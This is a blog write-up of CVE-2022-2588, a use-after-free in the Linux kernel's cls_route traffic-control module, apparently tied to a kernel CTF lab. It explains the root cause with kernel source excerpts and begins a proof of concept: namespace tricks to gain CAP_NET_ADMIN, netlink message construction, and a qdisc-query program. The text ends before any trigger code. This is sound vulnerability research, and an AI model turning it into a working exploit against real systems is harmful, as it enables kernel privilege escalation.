CVE-2022-2588: Use After Free In Linux Kernel Cls Route Module

· omacs's blog


Introduction #

0xCD4 modeled CVE-2022-2588 in objstore, one of the Kernel CTF Lab challenges. The vulnerability is a use-after-free (UAF) in the cls_route module, which implements a filter in the Traffic Control (TC) subsystem of the Linux kernel. Based on kernel version 5.18, this post looks at how the UAF arises and then writes proof-of-concept (PoC) code [1, 2].

Root Cause Analysis #

The cls_route module defines the route4_filter structure as follows and manages filters as a linked list (excerpt from net/sched/cls_route.c) [3].

struct route4_filter {
    struct route4_filter __rcu  *next;
    u32                         id;
    int                         iif;

    struct tcf_result           res;
    struct tcf_exts             exts;
    u32                         handle;
    struct route4_bucket        *bkt;
    struct tcf_proto            *tp;
    struct rcu_work             rwork;
};

The heads of these lists are stored as arrays in the route4_head and route4_bucket structures (excerpt from net/sched/cls_route.c) [3].

struct route4_head {
    struct route4_fastmap       fastmap[16];
    struct route4_bucket __rcu  *table[256 + 1];
    struct rcu_head             rcu;
};

struct route4_bucket {
    /* 16 FROM buckets + 16 IIF buckets + 1 wildcard bucket */
    struct route4_filter __rcu  *ht[16 + 16 + 1];
    struct rcu_head             rcu;
};

The array indices are obtained by hashing the value stored in the handle member of the route4_filter structure. Reading the implementation of route4_get gives a feel for how this works (excerpt from net/sched/cls_route.c) [3].

static void *route4_get(struct tcf_proto *tp, u32 handle)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_bucket *b;
    struct route4_filter *f;
    unsigned int h1, h2;

    h1 = to_hash(handle);
    if (h1 > 256)
        return NULL;

    h2 = from_hash(handle >> 16);
    if (h2 > 32)
        return NULL;

    b = rtnl_dereference(head->table[h1]);
    if (b) {
        for (f = rtnl_dereference(b->ht[h2]);
             f;
             f = rtnl_dereference(f->next))
            if (f->handle == handle)
                return f;
    }
    return NULL;
}
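The excerpt calls to_hash and from_hash without showing them. The following is a minimal user-space sketch of the two hashes, reproduced from memory of net/sched/cls_route.c, so the exact bodies should be treated as an assumption and checked against the kernel tree. The lookup_slot helper is hypothetical and only mirrors the two range checks in route4_get.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed to mirror to_hash(): index into head->table[]. */
uint32_t to_hash(uint32_t id)
{
    uint32_t h = id & 0xFF;

    if (id & 0x8000)
        h += 256;
    return h;
}

/* Assumed to mirror from_hash(): index into bucket->ht[]. */
uint32_t from_hash(uint32_t id)
{
    id &= 0xFFFF;
    if (id == 0xFFFF)
        return 32;              /* wildcard bucket */
    if (!(id & 0x8000)) {
        if (id > 255)
            return 256;         /* out of range, rejected by the caller */
        return id & 0xF;        /* one of the 16 FROM buckets */
    }
    return 16 + (id & 0xF);     /* one of the 16 IIF buckets */
}

/* Hypothetical helper: compute both indices the way route4_get does.
 * Returns 1 if the handle maps to a valid slot, 0 otherwise. */
int lookup_slot(uint32_t handle, uint32_t *h1, uint32_t *h2)
{
    assert(h1 && h2);
    *h1 = to_hash(handle);
    if (*h1 > 256)
        return 0;
    *h2 = from_hash(handle >> 16);
    if (*h2 > 32)
        return 0;
    return 1;
}
```

Under these definitions a handle of 0 maps to table[0] and ht[0], which is the slot the rest of this post cares about.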

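route4_change is invoked by tc_new_tfilter through the change function pointer and replaces the existing filter (the fold pointer) with a newly allocated one (the f pointer). The problem is that when the handle member of the existing filter is 0, the filter is not removed from the list ({1}), yet its memory is still freed ({2}) (excerpt from net/sched/cls_route.c) [3].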

static int route4_change(struct net *net, struct sk_buff *in_skb,
                         struct tcf_proto *tp, unsigned long base, u32 handle,
                         struct nlattr **tca, void **arg, u32 flags,
                         struct netlink_ext_ack *extack)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_filter __rcu **fp;
    struct route4_filter *fold, *f1, *pfp, *f = NULL;
    struct route4_bucket *b;
    struct nlattr *opt = tca[TCA_OPTIONS];
    struct nlattr *tb[TCA_ROUTE4_MAX + 1];
    unsigned int h, th;
    int err;
    bool new = true;

    /* ... */

    fold = *arg;
    if (fold && handle && fold->handle != handle)
        return -EINVAL;

    err = -ENOBUFS;
    f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
    if (!f)
        goto errout;

    /* ... */

    if (fold) {
        f->id = fold->id;
        f->iif = fold->iif;
        f->res = fold->res;
        f->handle = fold->handle;

        f->tp = fold->tp;
        f->bkt = fold->bkt;
        new = false;
    }

    /* ... */

    if (fold && fold->handle && f->handle != fold->handle) { /* {1} */
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
        if (b) {
            fp = &b->ht[h];
            for (pfp = rtnl_dereference(*fp); pfp;
                 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
                if (pfp == fold) {
                    rcu_assign_pointer(*fp, fold->next);
                    break;
                }
            }
        }
    }

    route4_reset_fastmap(head);
    *arg = f;
    if (fold) {                 /* {2} */
        tcf_unbind_filter(tp, &fold->res);
        tcf_exts_get_net(&fold->exts);
        tcf_queue_work(&fold->rwork, route4_delete_filter_work);
    }
    return 0;

errout:
    if (f)
        tcf_exts_destroy(&f->exts);
    kfree(f);
    return err;
}
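To make the effect of {1} and {2} concrete, here is a small user-space model of the replacement step. It is a sketch, not kernel code: toy_filter, toy_insert, toy_change, and toy_count_dangling are hypothetical names, sorted insertion and RCU are left out, and a freed flag stands in for the deferred kfree so that the model itself never touches freed memory.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for struct route4_filter. */
struct toy_filter {
    struct toy_filter *next;
    uint32_t handle;
    bool freed;                 /* set where the kernel would free the node */
};

/* Insert f at the head of the list (ordering is ignored in this sketch). */
void toy_insert(struct toy_filter **head, struct toy_filter *f)
{
    f->next = *head;
    *head = f;
}

/* Replace fold with f, using the same unlink condition as {1}. */
void toy_change(struct toy_filter **head, struct toy_filter *fold,
                struct toy_filter *f)
{
    assert(head && f);
    toy_insert(head, f);

    if (fold && fold->handle && f->handle != fold->handle) {   /* {1} */
        struct toy_filter **fp;

        for (fp = head; *fp; fp = &(*fp)->next) {
            if (*fp == fold) {
                *fp = fold->next;
                break;
            }
        }
    }

    if (fold)                                                  /* {2} */
        fold->freed = true;
}

/* Count list entries that are still linked although already "freed". */
int toy_count_dangling(const struct toy_filter *head)
{
    int n = 0;

    for (; head; head = head->next)
        if (head->freed)
            n++;
    return n;
}
```

With an old filter whose handle is 0, the unlink branch is skipped and the list keeps a pointer to a node that has been marked freed. With a nonzero old handle that differs from the new one, the node is unlinked first and nothing dangles.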

Proof of Concept #

User namespace and capabilities #

Triggering this vulnerability requires the CAP_NET_ADMIN capability, which the following source confirms (excerpt from net/sched/cls_api.c) [3].

static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
                          struct netlink_ext_ack *extack)
{
    struct net *net = sock_net(skb->sk);

    /* ... */

    if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
        return -EPERM;

    /* ... */
}

For an ordinary user to obtain this capability, even if only nominally, the process has to move into new namespaces. These can be obtained by calling the unshare system call with the CLONE_NEWUSER | CLONE_NEWNET flags [9, 10].
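One way to check the effect of the namespace switch is to look at the effective capability set before and after it. The sketch below is an illustration under a few assumptions: cap_is_set, read_cap_eff, and net_admin_after_unshare are hypothetical helpers, the CapEff line of /proc/self/status is used as the data source, and the raw unshare syscall is used only so that the snippet does not depend on feature-test macros.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/sched.h>

#ifndef CAP_NET_ADMIN
#define CAP_NET_ADMIN 12    /* value from include/uapi/linux/capability.h */
#endif

/* Return 1 if capability number cap is set in the bitmask. */
int cap_is_set(uint64_t mask, int cap)
{
    assert(cap >= 0 && cap < 64);
    return (int)((mask >> cap) & 1);
}

/* Parse the CapEff line of /proc/self/status; returns 0 on success. */
int read_cap_eff(uint64_t *mask)
{
    char line[256];
    int found = -1;
    FILE *fp = fopen("/proc/self/status", "r");

    if (!fp)
        return -1;
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long v;

        if (sscanf(line, "CapEff: %llx", &v) == 1) {
            *mask = v;
            found = 0;
            break;
        }
    }
    fclose(fp);
    return found;
}

/* Enter new user and network namespaces, then report CAP_NET_ADMIN.
 * Returns 1 if held, 0 if not, -1 if unshare or the read failed. */
int net_admin_after_unshare(void)
{
    uint64_t eff;

    if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) == -1)
        return -1;
    if (read_cap_eff(&eff) == -1)
        return -1;
    return cap_is_set(eff, CAP_NET_ADMIN);
}
```

Whether the unshare call succeeds depends on the system configuration, since some distributions restrict unprivileged user namespaces.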

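Netlink is a socket-based interface for communication between user space and the kernel. The protocol parameter of the socket system call is used here to select the subsystem to talk to. The TC functionality discussed in this post is reached through rtnetlink, which is designated by NETLINK_ROUTE. Messages sent to the kernel over it have the following form [4, 5, 6].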

[ Netlink message header ][ Subsystem message header ][ Attributes ]

@ Subsystem message header structures: struct tcmsg, etc.

The netlink message header above is the nlmsghdr structure, defined as follows (excerpt from include/uapi/linux/netlink.h) [3].

struct nlmsghdr {
    __u32       nlmsg_len;      /* Length of message including header */
    __u16       nlmsg_type;     /* Message content */
    __u16       nlmsg_flags;    /* Additional flags */
    __u32       nlmsg_seq;      /* Sequence number */
    __u32       nlmsg_pid;      /* Sending process port ID */
};

The subsystem message header depends on which subsystem is being addressed. For TC it is the tcmsg structure, defined as follows (excerpt from include/uapi/linux/rtnetlink.h) [3].

struct tcmsg {
    unsigned char   tcm_family;
    unsigned char   tcm__pad1;
    unsigned short  tcm__pad2;
    int             tcm_ifindex;
    __u32           tcm_handle;
    __u32           tcm_parent;
/* tcm_block_index is used instead of tcm_parent
 * in case tcm_ifindex == TCM_IFINDEX_MAGIC_BLOCK
 */
#define tcm_block_index tcm_parent
    __u32           tcm_info;
};

The attributes likewise depend on which netlink family the message is sent to. With rtnetlink, for example, the rtattr structure is used (excerpt from include/uapi/linux/rtnetlink.h) [3, 5].

/*
   Generic structure for encapsulation of optional route information.
   It is reminiscent of sockaddr, but with sa_family replaced
   with attribute type.
 */

struct rtattr {
    unsigned short  rta_len;
    unsigned short  rta_type;
};
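The three parts described above can be laid out in one buffer to see how the lengths add up. The sketch below assumes the Linux UAPI headers are installed; demo_req, demo_put_attr, and demo_build are hypothetical names, and the attribute payload includes the trailing NUL byte, which is a choice of this sketch.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>

/* [ nlmsghdr ][ tcmsg ][ attributes ] in one contiguous buffer. */
struct demo_req {
    struct nlmsghdr hdr;
    struct tcmsg tc;
    uint8_t attrs[64];
};

/* Append one attribute after the current end of the message.
 * Returns the new nlmsg_len, or 0 if it would not fit. */
uint32_t demo_put_attr(struct demo_req *req, unsigned short type,
                       const void *data, unsigned short len)
{
    uint32_t off;
    struct rtattr *rta;

    assert(req);
    off = NLMSG_ALIGN(req->hdr.nlmsg_len);
    if (off + RTA_ALIGN(RTA_LENGTH(len)) > sizeof(*req))
        return 0;
    rta = (struct rtattr *)((char *)req + off);
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);     /* attribute header plus payload */
    if (len)
        memcpy(RTA_DATA(rta), data, len);
    req->hdr.nlmsg_len = off + RTA_ALIGN(rta->rta_len);
    return req->hdr.nlmsg_len;
}

/* Build [nlmsghdr][tcmsg][TCA_KIND="htb"] and return the total length. */
uint32_t demo_build(struct demo_req *req)
{
    memset(req, 0, sizeof(*req));
    req->hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req->tc));
    req->hdr.nlmsg_type = RTM_NEWQDISC;
    req->hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    req->tc.tcm_family = AF_UNSPEC;
    return demo_put_attr(req, TCA_KIND, "htb", sizeof("htb"));
}
```

Here the 16-byte netlink header and the 20-byte tcmsg give 36 bytes, and the 4-byte attribute header plus the 4-byte payload bring the total to 44.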

rtnetlink has the RTM_ family of message types and uses the rtnl_register function to map each message type to the function that handles it (excerpt from net/core/rtnetlink.c) [3, 5].

/**
 * rtnl_register - Register a rtnetlink message type
 * @protocol: Protocol family or PF_UNSPEC
 * @msgtype: rtnetlink message type
 * @doit: Function pointer called for each request message
 * @dumpit: Function pointer called for each dump request (NLM_F_DUMP) message
 * @flags: rtnl_link_flags to modify behaviour of doit/dumpit functions
 *
 * Registers the specified function pointers (at least one of them has
 * to be non-NULL) to be called whenever a request message for the
 * specified protocol family and message type is received.
 *
 * The special protocol family PF_UNSPEC may be used to define fallback
 * function pointers for the case when no entry for the specific protocol
 * family exists.
 */
void rtnl_register(int protocol, int msgtype,
                   rtnl_doit_func doit, rtnl_dumpit_func dumpit,
                   unsigned int flags)
{
    int err;

    err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
                                 flags);
    if (err)
        pr_err("Unable to register rtnetlink message handler, "
               "protocol = %d, message type = %d\n", protocol, msgtype);
}

void __init rtnetlink_init(void)
{
    /* ... */

    rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
                  rtnl_dump_ifinfo, 0);
    rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

    rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
    rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
    rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

    rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

    rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
    rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL, 0);
    rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

    rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
    rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
    rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

    rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
                  0);
    rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}

The same kind of registration appears in the TC-related APIs that are reached through rtnetlink. The classifier API, for example, registers the filter-related message types (excerpt from net/sched/cls_api.c) [3].

static int __init tc_filter_init(void)
{
    int err;

    /* ... */

    rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
                  RTNL_FLAG_DOIT_UNLOCKED);
    rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
                  RTNL_FLAG_DOIT_UNLOCKED);
    rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
                  tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
    rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
                  tc_dump_chain, 0);

    return 0;

    /* ... */
}

When one of these types is placed in the nlmsg_type member of the nlmsghdr structure and the message is sent, the function mapped to it is called.
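The idea of mapping a message type to a handler can be illustrated with a small table. This is a toy model and not the kernel's implementation, which also keys on the protocol family and keeps separate doit and dumpit pointers; toy_register, toy_dispatch, and toy_new_tfilter are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <linux/rtnetlink.h>

typedef int (*toy_doit_func)(int msgtype);

/* One slot per RTM_* message type, indexed from RTM_BASE. */
static toy_doit_func toy_handlers[RTM_MAX - RTM_BASE + 1];

/* Toy counterpart of rtnl_register(): remember the handler for msgtype. */
int toy_register(int msgtype, toy_doit_func doit)
{
    if (msgtype < RTM_BASE || msgtype > RTM_MAX)
        return -1;
    toy_handlers[msgtype - RTM_BASE] = doit;
    return 0;
}

/* Toy counterpart of the receive path: pick the handler by nlmsg_type.
 * Returns the handler's result, or -1 if no handler is registered. */
int toy_dispatch(const struct nlmsghdr *nlh)
{
    toy_doit_func doit;

    assert(nlh);
    if (nlh->nlmsg_type < RTM_BASE || nlh->nlmsg_type > RTM_MAX)
        return -1;
    doit = toy_handlers[nlh->nlmsg_type - RTM_BASE];
    return doit ? doit(nlh->nlmsg_type) : -1;
}

/* Stand-in for tc_new_tfilter(): just reports which type reached it. */
int toy_new_tfilter(int msgtype)
{
    return msgtype;
}
```

After toy_register(RTM_NEWTFILTER, toy_new_tfilter), a header whose nlmsg_type is RTM_NEWTFILTER reaches the stand-in handler, while an unregistered type is rejected.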

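Composing netlink messages by hand, sending them, and interpreting the replies requires attention to many details. For sending and receiving messages it is therefore better to rely on existing library functions. moises-silva presented the example that best fits this goal. The libnetlink.h and libnetlink.c files it needs can be taken from the iproute2 source [7, 8].

As moises-silva's example also shows, communicating through libnetlink follows a fixed pattern [7].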

  1. Open rtnetlink (rtnl) handle
  2. Set netlink message header
  3. Set subsystem message header (e.g., tcmsg)
  4. Set attributes
  5. Call rtnl_talk function
  6. Close rtnetlink (rtnl) handle

Based on this, let's write an example that reads queueing discipline information. The tc_qdisc.c file in iproute2 shows how the headers should be filled in. The resulting example is as follows [8].

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <signal.h>
#include <time.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/uio.h>
#include <unistd.h>
#include <sched.h>
#include <fcntl.h>
#include <syslog.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_link.h>
#include <linux/neighbour.h>
#include <linux/netconf.h>
#include <linux/if_ether.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <libnl3/netlink/route/tc.h>
#include <libnl3/netlink/route/qdisc.h>
#include <libnl3/netlink/route/qdisc/tbf.h>

/* ----------------------< libnetlink >--------------------------------- */

struct rtnl_handle {
    int                 fd;
    struct sockaddr_nl  local;
    struct sockaddr_nl  peer;
    __u32               seq;
    __u32               dump;
    int                 proto;
    FILE               *dump_fp;
#define RTNL_HANDLE_F_LISTEN_ALL_NSID 0x01
    int                 flags;
};

#define NLMSG_TAIL(nmsg) \
    ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))

static inline const char *rta_getattr_str(const struct rtattr *rta)
{
    return (const char *)RTA_DATA(rta);
}

/* Append one attribute of alen bytes to the end of message n. */
static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
                     int alen)
{
    int len = RTA_LENGTH(alen);
    struct rtattr *rta;

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
        fprintf(stderr,
                "addattr_l ERROR: message exceeded bound of %d\n",
                maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen)   /* addattr_nest passes data == NULL with alen == 0 */
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}

static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
{
    return addattr_l(n, maxlen, type, &data, sizeof(__u32));
}

static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
{
    return addattr_l(n, maxlen, type, &data, sizeof(__u64));
}

/* Open a nested attribute; close it with addattr_nest_end. */
static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
{
    struct rtattr *nest = NLMSG_TAIL(n);

    addattr_l(n, maxlen, type, NULL, 0);
    return nest;
}

static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
{
    nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
    return n->nlmsg_len;
}

#ifndef SOL_NETLINK
#define SOL_NETLINK 270
#endif

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

static int rcvbuf = 1024 * 1024;

static void rtnl_close(struct rtnl_handle *rth)
{
    if (rth->fd >= 0) {
        close(rth->fd);
        rth->fd = -1;
    }
}

static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
                             int protocol)
{
    socklen_t addr_len;
    int sndbuf = 32768;

    memset(rth, 0, sizeof(*rth));

    rth->proto = protocol;
    rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
    if (rth->fd < 0) {
        perror("Cannot open netlink socket");
        return -1;
    }

    if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
                   &sndbuf, sizeof(sndbuf)) < 0) {
        perror("SO_SNDBUF");
        return -1;
    }

    if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
                   &rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("SO_RCVBUF");
        return -1;
    }

    memset(&rth->local, 0, sizeof(rth->local));
    rth->local.nl_family = AF_NETLINK;
    rth->local.nl_groups = subscriptions;

    if (bind(rth->fd, (struct sockaddr *)&rth->local,
             sizeof(rth->local)) < 0) {
        perror("Cannot bind netlink socket");
        return -1;
    }
    addr_len = sizeof(rth->local);
    if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
                    &addr_len) < 0) {
        perror("Cannot getsockname");
        return -1;
    }
    if (addr_len != sizeof(rth->local)) {
        fprintf(stderr, "Wrong address length %d\n", addr_len);
        return -1;
    }
    if (rth->local.nl_family != AF_NETLINK) {
        fprintf(stderr, "Wrong address family %d\n",
                rth->local.nl_family);
        return -1;
    }
    rth->seq = time(NULL);
    return 0;
}

static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
{
    return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
}

/* Send request n and wait for the matching reply; at most maxlen bytes
 * of the reply are copied into answer when answer is not NULL. */
static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
                       struct nlmsghdr *answer, size_t maxlen,
                       bool show_rtnl_err)
{
    int status;
    unsigned int seq;
    struct nlmsghdr *h;
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct iovec iov = {
        .iov_base = n,
        .iov_len = n->nlmsg_len
    };
    struct msghdr msg = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    char buf[32768] = {};

    n->nlmsg_seq = seq = ++rtnl->seq;

    if (answer == NULL)
        n->nlmsg_flags |= NLM_F_ACK;

    status = sendmsg(rtnl->fd, &msg, 0);
    if (status < 0) {
        perror("Cannot talk to rtnetlink");
        return -1;
    }

    iov.iov_base = buf;
    while (1) {
        iov.iov_len = sizeof(buf);
        status = recvmsg(rtnl->fd, &msg, 0);

        if (status < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            fprintf(stderr, "netlink receive error %s (%d)\n",
                    strerror(errno), errno);
            return -1;
        }
        if (status == 0) {
            fprintf(stderr, "EOF on netlink\n");
            return -1;
        }
        if (msg.msg_namelen != sizeof(nladdr)) {
            fprintf(stderr,
                    "sender address length == %d\n",
                    msg.msg_namelen);
            exit(1);
        }
        for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
            int len = h->nlmsg_len;
            int l = len - sizeof(*h);

            if (l < 0 || len > status) {
                if (msg.msg_flags & MSG_TRUNC) {
                    fprintf(stderr, "Truncated message\n");
                    return -1;
                }
                fprintf(stderr,
                        "!!!malformed message: len=%d\n",
                        len);
                exit(1);
            }

            if (nladdr.nl_pid != 0 ||
                h->nlmsg_pid != rtnl->local.nl_pid ||
                h->nlmsg_seq != seq) {
                /* Don't forget to skip that message. */
                status -= NLMSG_ALIGN(len);
                h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
                continue;
            }

            if (h->nlmsg_type == NLMSG_ERROR) {
                struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);

                if (l < sizeof(struct nlmsgerr)) {
                    fprintf(stderr, "ERROR truncated\n");
                } else if (!err->error) {
                    if (answer)
                        memcpy(answer, h,
                               MIN(maxlen, h->nlmsg_len));
                    return 0;
                }

                if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
                    fprintf(stderr,
                            "RTNETLINK answers: %s\n",
                            strerror(-err->error));
                errno = -err->error;
                return -1;
            }

            if (answer) {
                memcpy(answer, h,
                       MIN(maxlen, h->nlmsg_len));
                return 0;
            }

            fprintf(stderr, "Unexpected reply!!!\n");

            status -= NLMSG_ALIGN(len);
            h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
        }

        if (msg.msg_flags & MSG_TRUNC) {
            fprintf(stderr, "Message truncated\n");
            continue;
        }

        if (status) {
            fprintf(stderr, "!!!Remnant of size %d\n", status);
            exit(1);
        }
    }
}

static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
                     struct nlmsghdr *answer, size_t maxlen)
{
    return __rtnl_talk(rtnl, n, answer, maxlen, true);
}

/* Index the attributes that follow rta into tb[] by attribute type. */
static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
                              int len, unsigned short flags)
{
    unsigned short type;

    memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
    while (RTA_OK(rta, len)) {
        type = rta->rta_type & ~flags;
        if ((type <= max) && (!tb[type]))
            tb[type] = rta;
        rta = RTA_NEXT(rta, len);
    }
    if (len)
        fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
                len, rta->rta_len);
    return 0;
}

/* --------------------------------------------------------------------- */

enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

void print_qdisc_info(const char *ifname)
{
    int err;
    struct tcmsg *t;
    struct rtattr *tb[TCA_MAX + 1];
    struct rtnl_handle rth;
    struct tc_req qdreq;
    struct tc_req res;  /* the reply carries attributes, so a bare
                         * struct nlmsghdr would be overrun by rtnl_talk */

    LOG_FUNC();

    /* 1. Open rtnl handle */
    err = rtnl_open(&rth, 0);
    if (err)
        die("rtnl_open");

    /* 2. Set netlink message header */
    memset(&qdreq, 0, sizeof(qdreq));
    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    qdreq.hdr.nlmsg_type = RTM_GETQDISC;

    /* 3. Set subsystem message header */
    qdreq.tchdr.tcm_family = AF_UNSPEC;
    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
    printf("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);

    /* 4. Set attributes (Not needed for this example) */

    /* 5. Call rtnl_talk function */
    memset(&res, 0, sizeof(res));
    err = rtnl_talk(&rth, &qdreq.hdr, &res.hdr, sizeof(res));
    if (err < 0)
        die("rtnl_talk");

    /* Parse and print response from the kernel */
    if (res.hdr.nlmsg_type != RTM_NEWQDISC &&
        res.hdr.nlmsg_type != RTM_DELQDISC) {
        fprintf(stderr, "Not a qdisc\n");
        exit(EXIT_FAILURE);
    }
    t = NLMSG_DATA(&res.hdr);

    parse_rtattr_flags(tb, TCA_MAX, TCA_RTA(t),
                       res.hdr.nlmsg_len - NLMSG_LENGTH(sizeof(*t)),
                       NLA_F_NESTED);
    if (tb[TCA_KIND])
        printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
               t->tcm_handle >> 16, t->tcm_handle);

    /* 6. Close rtnetlink handle */
    rtnl_close(&rth);
}

int main(void)
{
    print_qdisc_info("lo");
    return 0;
}

Traffic Control Queueing Discipline #

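A queueing discipline (qdisc) defines the rules by which the kernel queues packets before handing them to the network adapter driver. Classes can be used to set the priority with which packets are taken from the queue, and qdiscs that support classes are called classful qdiscs. A filter, in turn, decides which class a packet is placed in when it is enqueued. Filters are therefore used by classful qdiscs, and adding a filter requires the qdisc of the network interface to be classful [11].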


In practice, the loopback device either has its qdisc set to noqueue or has no qdisc set at all. We therefore set it to htb, which is a classful qdisc. The elements that have to be set for this are as follows [3, 8].

nlmsghdr member    Value
nlmsg_len          NLMSG_LENGTH(sizeof(<subsystem header structure variable>))
nlmsg_flags        NLM_F_REQUEST | NLM_F_CREATE
nlmsg_type         RTM_NEWQDISC

tcmsg member       Value
tcm_family         AF_UNSPEC
tcm_ifindex        ifindex of the network interface
tcm_handle         32-bit handle (e.g., 0x10000)
tcm_parent         parent handle or TC_H_ROOT

Attribute          Value
TCA_KIND           "htb"
TCA_OPTIONS        Not NULL
TCA_HTB_INIT       struct tc_htb_glob, with the version member set to 0x30011 >> 16
